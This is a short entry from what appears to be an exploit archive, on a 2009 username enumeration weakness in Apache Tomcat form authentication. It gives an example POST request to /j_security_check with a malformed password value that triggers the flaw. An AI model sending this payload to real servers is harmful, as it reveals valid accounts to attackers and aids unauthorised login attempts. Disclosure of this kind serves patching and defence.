Apache Tomcat Form Authentication Username Enumeration Weakness

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Apache Tomcat Form Authentication Username Enumeration Weakness
# Published : 2009-11-09
# Author : D. Matscheko
# Previous Title : Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
# Next Title : IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow

Attackers can use readily available tools to exploit this issue.

The following example POST data is available:

POST /j_security_check HTTP/1.1
Host: www.example.com

j_username=tomcat&j_password=%